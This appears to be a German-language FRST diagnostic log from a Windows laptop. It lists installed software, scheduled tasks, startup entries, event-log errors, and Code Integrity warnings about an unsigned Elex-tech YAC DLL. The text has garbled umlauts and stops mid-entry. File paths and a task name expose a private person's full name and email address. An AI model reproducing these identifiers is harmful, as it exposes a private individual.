Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.4.4 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.7.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.20.13 - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 5.2.0 - Canon Inc.)
Canon MG5700 series Benutzerregistrierung (HKLM-x32\...\Canon MG5700 series Benutzerregistrierung) (Version:  - *Canon Inc.)
Canon MG5700 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5700_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.3.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.7.1 - Canon Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.1.2 - )
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio 12.1.2 (HKLM\...\FL Studio 12.1.2_is1) (Version:  - )
FL Studio ASIO (HKLM\...\FL Studio ASIO) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
FreeOCR v5.4 (HKLM-x32\...\freeocr_is1) (Version:  - )
GIMP 2.8.20 (HKLM\...\GIMP-2_is1) (Version: 2.8.20 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 59.0.3071.86 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
HandBrake 0.10.5 (HKLM-x32\...\HandBrake) (Version: 0.10.5 - )
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Malwarebytes Version 3.1.2.1733 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes)
MegaDownloader 1.7 (HKLM\...\{C12C2297-65A4-4E64-9AE1-29F0D947FDA0}}_is1) (Version: 1.7 - AppsForMega.info)
Microsoft OneDrive (HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022.218 (HKLM-x32\...\{E503B4BF-F7BB-3D5F-8BC8-F694B1CFF942}) (Version: 9.0.21022.218 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 53.0.3 (x64 de) (HKLM\...\Mozilla Firefox 53.0.3 (x64 de)) (Version: 53.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.3 - Mozilla)
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.77242 - TeamViewer)
VirtualDJ 8 (HKLM-x32\...\{2C513174-818D-4D9E-B88F-3E2872BACA20}) (Version: 8.2.3493.0 - Atomix Productions)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.40 (32-Bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Nick Schuster\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileCoAuthLib64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {05D48E00-BF2C-4CEB-B7DF-04409233784E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-17] (Google Inc.)
Task: {49A10F24-190A-4ED7-9B48-C3CB6BBBC914} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3847841184-804715454-2304624315-1001
Task: {53A67BD4-6351-4805-A436-9353CBFAAAFA} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-wiiu02015@outlook.de => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe 
Task: {673824BA-7A3C-41BF-A4DA-9C4F9887830A} - System32\Tasks\Red Giant Link => C:\Program Files\Red Giant Link\Red Giant Link.exe 
Task: {9376D540-EE5F-4016-8595-273CB525CC42} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2017-05-23] (Microsoft Corporation)
Task: {9C8653D0-0863-4F6C-BDC9-E813956ACA92} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe 
Task: {B8732800-4537-42E1-8E92-0D38D2678C49} - System32\Tasks\OneDrive Standalone Update Task v2 => C:\Users\Nick Schuster\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe [2017-05-13] ()
Task: {D4BAA7ED-86EB-4B60-9F30-8E2D64B7D175} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {DBE77801-9F7F-4CE7-9DE2-FDB39098637C} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_171_pepper.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {F6691563-4A82-4630-97F5-2AD5B410283B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-17] (Google Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verkn黳fungen =============================

(Die Eintr鋑e k鰊nen gelistet werden, um sie zur點kzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-02-27 11:37 - 2016-02-04 12:53 - 00387144 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2017-06-05 15:57 - 2017-05-31 11:09 - 02270664 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2015-08-09 05:50 - 2016-10-07 00:07 - 00393208 _____ () C:\Windows\system32\igfxTray.exe
2015-12-02 18:58 - 2015-11-16 20:32 - 00919040 _____ () C:\Windows\mod_frst.exe

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verkn黳fungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zur點kgesetzt oder entfernt.)


==================== Internet Explorer Vertrauensw黵dig/Eingeschr鋘kt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn ben鰐igt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zur點kzusetzen.)

2016-11-23 18:06 - 2017-06-05 15:51 - 00000832 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix f黵 diesen Bereich.)

HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows Photo Viewer\Hintergrundbild der Windows-Fotoanzeige.jpg
DNS Servers: 192.168.0.1 - 192.168.0.2
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Eintr鋑e ==

MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BITS => 2
MSCONFIG\Services: DbxSvc => 2
MSCONFIG\Services: KingoSoftService => 2
MSCONFIG\Services: SysLinkMapper => 2
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "AirServer64"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "BlueStacks Agent"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "KiesTrayAgent"
HKLM\...\StartupApproved\Run32: => "IJNetworkScannerSelectorEX"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spiele Post"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{54966FEA-13CB-49D2-9C2A-E9FAF7B69422}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

28-05-2017 11:43:38 Windows Update
28-05-2017 20:39:08 DirectX wurde installiert
30-05-2017 14:03:51 Removed Samsung Kies
31-05-2017 17:31:09 Removed Vegas Pro 13.0 (64-bit)
01-06-2017 21:49:48 Installed NetAdapterUpdate

==================== Fehlerhafte Ger鋞e im Ger鋞emanager =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: USB2.0-CRW
Description: USB2.0-CRW
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereintr鋑e in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (06/07/2017 10:59:45 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/07/2017 10:59:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0x6a0
Startzeit der fehlerhaften Anwendung: 0x01d2df6c653dc1d8
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: a30bae9b-4b5f-11e7-8426-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1

Error: (06/07/2017 10:45:50 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/07/2017 10:45:50 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/07/2017 10:45:50 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/07/2017 10:45:47 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0xf80
Startzeit der fehlerhaften Anwendung: 0x01d2df6a74ff552f
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: b2c15643-4b5d-11e7-8426-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1

Error: (06/07/2017 10:45:45 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0xf40
Startzeit der fehlerhaften Anwendung: 0x01d2df6a7437103b
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: b1fb731a-4b5d-11e7-8426-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1

Error: (06/07/2017 10:45:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0xbb4
Startzeit der fehlerhaften Anwendung: 0x01d2df6a688ba5db
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: ae088a3f-4b5d-11e7-8426-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1

Error: (06/07/2017 10:45:31 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „Microsoft.WindowsAlarms_8wekyb3d8bbwe!App“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/07/2017 10:38:26 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.


Systemfehler:
=============
Error: (06/07/2017 10:59:40 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/07/2017 10:45:48 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/07/2017 10:45:46 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/07/2017 10:45:45 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/07/2017 10:45:31 AM) (Source: DCOM) (EventID: 10016) (User: RAZERLAP)
Description: Durch die Berechtigungseinstellungen f黵 "Anwendungsspezifisch" wird dem Benutzer "RAZERLAP\Nick Schuster" (SID: S-1-5-21-3847841184-804715454-2304624315-1001) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Start" f黵 die COM-Serveranwendung mit der CLSID 
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
 und der APPID 
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
 im Anwendungscontainer "Nicht verf黦bar" (SID: Nicht verf黦bar) gew鋒rt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool f黵 Komponentendienste ge鋘dert werden.

Error: (06/07/2017 10:45:26 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "App.AppX2tphb21dp9jkkycchwvscnrxk12cys3z.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/07/2017 10:44:03 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "Windows Media Player-Netzwerkfreigabedienst" ist vom Dienst "Windows Search" abh鋘gig, der aufgrund folgenden Fehlers nicht gestartet wurde: 
Der Dienst konnte wegen einer fehlerhaften Anmeldung nicht gestartet werden.

Error: (06/07/2017 10:44:03 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Windows Search" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst konnte wegen einer fehlerhaften Anmeldung nicht gestartet werden.

Error: (06/07/2017 10:44:03 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Der Dienst "WSearch" konnte sich nicht als "NT AUTHORITY\SYSTEM" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: 
Die Anforderung wird nicht unterst黷zt.


Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC).

Error: (06/07/2017 10:44:03 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Windows Search" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst konnte wegen einer fehlerhaften Anmeldung nicht gestartet werden.


CodeIntegrity:
===================================
  Date: 2017-05-03 18:07:17.434
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 18:06:29.117
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:37:01.065
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:37:00.358
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:24:33.560
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 15:20:35.981
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 16:06:23.178
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.444
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.282
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.275
